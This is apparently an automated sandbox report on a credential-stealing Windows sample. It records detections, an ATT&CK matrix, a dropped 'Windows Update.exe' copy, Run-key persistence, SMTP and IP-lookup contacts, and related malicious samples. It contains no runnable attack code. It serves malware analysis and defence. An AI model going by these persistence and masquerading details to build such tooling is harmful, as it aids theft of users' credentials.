                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPE
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_005D0DBA bind,0_2_005D0DBA
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_005D09AA listen,0_2_005D09AA
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_005D096C listen,0_2_005D096C
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_005D0D87 bind,0_2_005D0D87
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_006409AA listen,2_2_006409AA
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00640DBA bind,2_2_00640DBA
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_0064096C listen,2_2_0064096C
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00640D87 bind,2_2_00640D87

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Replication Through Removable Media1Windows Management Instrumentation21Registry Run Keys / Startup Folder1Access Token Manipulation1Disable or Modify Tools1Input Capture21Peripheral Device Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection411Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsShared Modules1Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information31Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsCommand and Scripting Interpreter2Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery31SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion4Cached Domain CredentialsVirtualization/Sandbox Evasion4VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol12Jamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection411Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Configuration Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          Sample_B.exe100%AviraTR/AD.MExecute.lzrac
                          Sample_B.exe100%AviraSPR/Tool.MailPassView.473
                          Sample_B.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\Windows Update.exe100%AviraTR/AD.MExecute.lzrac
                          C:\Users\user\AppData\Roaming\Windows Update.exe100%AviraSPR/Tool.MailPassView.473
                          C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%AviraTR/AD.MExecute.lzrac
                          C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%AviraSPR/Tool.MailPassView.473
                          C:\Users\user\AppData\Roaming\Windows Update.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\WindowsUpdate.exe100%Joe Sandbox ML

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          0.0.Sample_B.exe.bc0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                          0.0.Sample_B.exe.bc0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                          2.2.Windows Update.exe.ee0000.1.unpack100%AviraTR/AD.MExecute.lzracDownload File
                          2.2.Windows Update.exe.ee0000.1.unpack100%AviraSPR/Tool.MailPassView.473Download File
                          0.2.Sample_B.exe.bc0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                          0.2.Sample_B.exe.bc0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                          2.0.Windows Update.exe.ee0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                          2.0.Windows Update.exe.ee0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File

                          Domains

                          SourceDetectionScannerLabelLink
                          cdn.digicertcdn.com0%VirustotalBrowse
                          163.190.5.0.in-addr.arpa0%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          http://ocsp.entrust.net030%URL Reputationsafe
                          http://ocsp.entrust.net030%URL Reputationsafe
                          http://ocsp.entrust.net030%URL Reputationsafe
                          http://ocsp.entrust.net030%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
                          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
                          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
                          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
                          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                          http://ocsp.pki.goog/gsr2020%URL Reputationsafe
                          http://ocsp.pki.goog/gsr2020%URL Reputationsafe
                          http://ocsp.pki.goog/gsr2020%URL Reputationsafe
                          http://ocsp.pki.goog/gsr2020%URL Reputationsafe
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                          https://pki.goog/repository/00%URL Reputationsafe
                          https://pki.goog/repository/00%URL Reputationsafe
                          https://pki.goog/repository/00%URL Reputationsafe
                          https://pki.goog/repository/00%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                          http://www.icra.org/vocabulary/.0%URL Reputationsafe
                          http://www.icra.org/vocabulary/.0%URL Reputationsafe
                          http://www.icra.org/vocabulary/.0%URL Reputationsafe
                          http://www.icra.org/vocabulary/.0%URL Reputationsafe
                          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
                          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
                          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
                          http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
                          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
                          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
                          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
                          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
                          http://www.%s.comPA0%URL Reputationsafe
                          http://www.%s.comPA0%URL Reputationsafe
                          http://www.%s.comPA0%URL Reputationsafe
                          http://www.%s.comPA0%URL Reputationsafe
                          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
                          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
                          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
                          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
                          http://ocsp.entrust.net0D0%URL Reputationsafe
                          http://ocsp.entrust.net0D0%URL Reputationsafe
                          http://ocsp.entrust.net0D0%URL Reputationsafe
                          http://ocsp.entrust.net0D0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          whatismyipaddress.com
                          		104.16.155.36
                          		truefalse
                            		high
                            cdn.digicertcdn.com
                            		104.18.10.39
                            		truefalseunknown
                            smtp.gmail.com
                            		66.102.1.108
                            		truefalse
                              		high
                              163.190.5.0.in-addr.arpa
                              		unknown
                              		unknowntrueunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://whatismyipaddress.com/false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.windows.com/pctv.Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://investor.msn.comSample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.msnbc.com/news/ticker.txtSample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpfalse
                                      		high
                                      http://crl.entrust.net/server1.crl0Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                        		high
                                        http://ocsp.entrust.net03Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://pki.goog/gsr2/GTS1O1.crt0Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.diginotar.nl/cps/pkioverheid0Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://ocsp.pki.goog/gsr202Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueSample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.hotmail.com/oeSample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpfalse
                                          		high
                                          https://pki.goog/repository/0Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckSample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmpfalse
                                            		high
                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.icra.org/vocabulary/.Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2113827446.0000000004A30000.00000002.00000001.sdmpfalse
                                              		high
                                              http://ocsp.pki.goog/gts1o1core0Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://investor.msn.com/Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmpfalse
                                                		high
                                                http://crl.pki.goog/GTS1O1core.crl0Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://whatismyipaddress.com/-Sample_B.exefalse
                                                  		high
                                                  http://www.%s.comPASample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2113827446.0000000004A30000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		low
                                                  https://login.yahoo.com/config/loginSample_B.exe, Windows Update.exefalse
                                                    		high
                                                    http://www.site.com/logs.phpWindows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://crl.pki.goog/gsr2/gsr2.crl0?Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.nirsoft.net/Sample_B.exefalse
                                                        		high
                                                        http://ocsp.entrust.net0DWindows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://secure.comodo.com/CPS0Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://crl.entrust.net/2048ca.crl0Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmpfalse
                                                            		high

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.16.155.36
                                                            		unknownUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            66.102.1.108
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Emerald
                                                            Analysis ID:354163
                                                            Start date:17.02.2021
                                                            Start time:14:15:06
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 9m 0s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:Sample_B.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@9/15@6/2
                                                            EGA Information:
                                                            • Successful, ratio: 66.7%
                                                            HDC Information:
                                                            • Successful, ratio: 11.4% (good quality ratio 8.2%)
                                                            • Quality average: 48.9%
                                                            • Quality standard deviation: 36.4%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 283
                                                            • Number of non-executed functions: 36
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.18.10.39, 2.20.142.210, 2.20.142.209
                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, watson.microsoft.com, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            14:15:33API Interceptor24x Sleep call for process: Sample_B.exe modified
                                                            14:15:35API Interceptor137x Sleep call for process: Windows Update.exe modified
                                                            14:15:39API Interceptor85x Sleep call for process: dw20.exe modified
                                                            14:15:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                            14:15:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            104.16.155.36PO_Invoices_pdf.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            Orders.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            nzGUqSK11D.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            PO 2010029_pdf Quotation from Alibaba Ale.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            PO 2010029_pdf Quotation from Alibaba Ale.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            hkaP5RPCGNDVq3Z.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            NDt93WWQwd089H7.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            BANK-STATMENT _xlsx.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            INQUIRY.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            Prueba de pago.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            mR3CdUkyLL.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            6JLHKYvboo.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            jSMd8npgmU.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            RXk6PjNTN8.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            9vdouqRTh3.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            5pB35gGfZ5.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            fyxC4Hgs3s.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            yk94P18VKp.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            oLHQIQAI3N.exeGet hashmaliciousBrowse
                                                            • whatismyipaddress.com/
                                                            66.102.1.108INQ4556 PO.exeGet hashmaliciousBrowse
                                                              ngx.exeGet hashmaliciousBrowse
                                                                CBT7797.exeGet hashmaliciousBrowse
                                                                  SCTB 372PO.exeGet hashmaliciousBrowse
                                                                    com.android.secrettalk-1.apkGet hashmaliciousBrowse
                                                                      https://drive.google.com/uc?export=download&id=1QwhJnu-bYB73eWYRaGC_EuhkzqVSA20NGet hashmaliciousBrowse
                                                                        https://drive.google.com/uc?export=download&id=1BZyO3k5sA4YaOJQDXxp2A3tfsIJBJP_-Get hashmaliciousBrowse
                                                                          PAYMENT 25SW Aug-06-2018.docGet hashmaliciousBrowse
                                                                            PAYMENT 25SW Aug-06-2018.docGet hashmaliciousBrowse
                                                                              https://protected-documents.solutions/adobe/absa/token.exeGet hashmaliciousBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                cdn.digicertcdn.comindex_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                p4lqqCq2c2.exeGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                n26UEy3elW.exeGet hashmaliciousBrowse
                                                                                • 104.18.11.39
                                                                                eAWqemQInU.exeGet hashmaliciousBrowse
                                                                                • 104.18.11.39
                                                                                fLPW6kLMgl.exeGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                a9YPGSem9V.exeGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                SecuriteInfo.com.Exploit.Siggen3.10048.3748.xlsGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                RFQ.xlsGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                SoftickAudioGatewayInstallerGet hashmaliciousBrowse
                                                                                • 104.18.11.39
                                                                                StrikeSolitaire3Get hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                InformaAllSecure_Enhanced_Health_Safety_Standards_2021.docmGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                InformaAllSecure_Enhanced_Health_Safety_Standards_2021.docmGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                Farie PO.docGet hashmaliciousBrowse
                                                                                • 104.18.11.39
                                                                                Cerere de pret NUM003112 09-02-2021.docGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                usd2.dllGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                PeerReviewResults.xlsGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                Walaa-Qasem-resume2.docGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                MY CV.docGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                INV8222874744_20210111490395.xlsmGet hashmaliciousBrowse
                                                                                • 104.18.10.39
                                                                                Inv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                • 104.18.11.39
                                                                                smtp.gmail.comSecuriteInfo.com.BehavesLike.Win32.Generic.jc.exeGet hashmaliciousBrowse
                                                                                • 74.125.206.109
                                                                                SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                • 74.125.206.108
                                                                                Ransomware Tortoise.exeGet hashmaliciousBrowse
                                                                                • 172.253.120.109
                                                                                Purchase_26012021_003429.exeGet hashmaliciousBrowse
                                                                                • 173.194.79.109
                                                                                Overdue_invoices.exeGet hashmaliciousBrowse
                                                                                • 108.177.119.109
                                                                                SIT-10295.exeGet hashmaliciousBrowse
                                                                                • 108.177.119.109
                                                                                QT21006189.exeGet hashmaliciousBrowse
                                                                                • 108.177.119.109
                                                                                fusion.exeGet hashmaliciousBrowse
                                                                                • 173.194.69.108
                                                                                Revised Invoice.exeGet hashmaliciousBrowse
                                                                                • 173.194.69.109
                                                                                transcach.exeGet hashmaliciousBrowse
                                                                                • 172.253.120.109
                                                                                PCS.exeGet hashmaliciousBrowse
                                                                                • 172.253.120.109
                                                                                transcach.exeGet hashmaliciousBrowse
                                                                                • 172.253.120.109
                                                                                ORDER-02044.exeGet hashmaliciousBrowse
                                                                                • 66.102.1.109
                                                                                EA0Y2020 Outstanding invoice 20190510to 20201214.exeGet hashmaliciousBrowse
                                                                                • 173.194.69.109
                                                                                vygtHoQaI1KaBVp.exeGet hashmaliciousBrowse
                                                                                • 173.194.69.108
                                                                                QCXw2WXDjOalhVZ.exeGet hashmaliciousBrowse
                                                                                • 108.177.119.109
                                                                                yqd2LHZ8y57Bzy4.exeGet hashmaliciousBrowse
                                                                                • 108.177.119.109
                                                                                knitted yarn documents.exeGet hashmaliciousBrowse
                                                                                • 172.253.120.109
                                                                                a9bdc406f87d6072599939a86b766fa4.exeGet hashmaliciousBrowse
                                                                                • 172.253.120.109
                                                                                SecuriteInfo.com.Generic.mg.e1df690a980825ac.exeGet hashmaliciousBrowse
                                                                                • 173.194.69.108
                                                                                whatismyipaddress.comPO_Invoices_pdf.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36
                                                                                Orders.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36
                                                                                nzGUqSK11D.exeGet hashmaliciousBrowse
                                                                                • 104.16.154.36
                                                                                PO 2010029_pdf Quotation from Alibaba Ale.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36
                                                                                PO 2010029_pdf Quotation from Alibaba Ale.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36
                                                                                hkaP5RPCGNDVq3Z.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36
                                                                                B6LNCKjOGt5EmFQ.exeGet hashmaliciousBrowse
                                                                                • 104.16.154.36
                                                                                NDt93WWQwd089H7.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36
                                                                                JkhR5oeRHA.exeGet hashmaliciousBrowse
                                                                                • 66.171.248.178
                                                                                PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36
                                                                                BANK-STATMENT _xlsx.exeGet hashmaliciousBrowse
                                                                                • 104.16.154.36
                                                                                INQUIRY.exeGet hashmaliciousBrowse
                                                                                • 104.16.154.36
                                                                                Prueba de pago.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36
                                                                                879mgDuqEE.jarGet hashmaliciousBrowse
                                                                                • 66.171.248.178
                                                                                remittance1111.jarGet hashmaliciousBrowse
                                                                                • 66.171.248.178
                                                                                879mgDuqEE.jarGet hashmaliciousBrowse
                                                                                • 66.171.248.178
                                                                                remittance1111.jarGet hashmaliciousBrowse
                                                                                • 66.171.248.178
                                                                                https://my-alliances.co.uk/Get hashmaliciousBrowse
                                                                                • 66.171.248.178
                                                                                c9o0CtTIYT.exeGet hashmaliciousBrowse
                                                                                • 104.16.154.36
                                                                                mR3CdUkyLL.exeGet hashmaliciousBrowse
                                                                                • 104.16.155.36

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                CLOUDFLARENETUSSecuriteInfo.com.Trojan.Inject4.6572.30773.exeGet hashmaliciousBrowse
                                                                                • 172.67.188.154
                                                                                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
